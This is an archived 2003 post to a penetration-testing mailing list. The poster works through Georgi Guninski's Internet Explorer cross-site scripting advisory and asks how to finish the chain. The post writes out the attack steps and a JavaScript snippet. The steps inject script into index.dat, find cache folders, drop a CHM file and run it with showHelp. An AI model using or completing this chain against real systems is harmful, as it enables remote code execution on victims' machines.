Testing Cross-Site Scripting to Inject and run malicious code

From: Indian Tiger (indiantiger@mailandnews.com)
Date: 04/12/03

    Date: Sat, 12 Apr 2003 11:41:45 -0400
    From: Indian Tiger <indiantiger@mailandnews.com>
    To: Pen-Test@securityfocus.com
    
    

    Hi All,

    I am testing cross-site scripting to inject and run malicious code. I was
    following Georgi Guninski's advisory, which was published on 23 November
    2000.

    Following this advisory, I am trying to inject a malicious file on the victim's
    machine and then run that injected file.

    According to this advisory we have to perform the following four steps to
    inject a file and run it.

    1) Inject JavaScript in "Index.dat" by
    window.open("http://somehost/index.html?>JSCODE</SCRIPT>"). The
    JavaScript is executed in index.dat and has access to its content, which allows
    finding the random directory names.

    2) parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary
    Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
    HEIGHT=200></OBJECT>

    3) After the Temporary Internet Files folders are known, inject for example chm
    files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>

    4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

    I am clear up to the second step he has specified, but I am not clear about the
    third and fourth stages. The third stage is going to inject the chm1.chm file on
    the victim's machine, but it is not clear whether this file is located on the
    victim's machine or the attacker's machine. Also, where will this file be stored
    on the victim's machine? This step also doesn't use the names of the random
    directories we found in the 2nd step, so I don't know why the second step is
    required, and how can we write JavaScript to find the random folders from the
    "Index.dat" file?

    The code for injecting JavaScript into Index.dat and displaying the content of
    the index.dat file is given as:
    <SCRIPT>
    b=window.open("http://10.10.10.10?>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
    s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
    setTimeout("document.writeln(s)",10000);
    </SCRIPT>

    This code should return the output of the index.dat file into a new blank
    window, but when I tried this I didn't get the output of the index.dat file in
    a new window; instead I got the output of index.dat in the same window in which
    I had written this code.

    I think that to run the JavaScript stored in the index.dat file, there is first
    a need to create an object that captures all the contents of the index.dat file,
    and then we should create a new window and assign its "Inner HTML Code" to the
    contents of the object created. I don't know whether it makes sense or not, but
    I am trying to do something like that.

    Any help on the above topics will be highly appreciated.

    Thanking You,
    Sincerely,

    Indian Tiger, CISSP

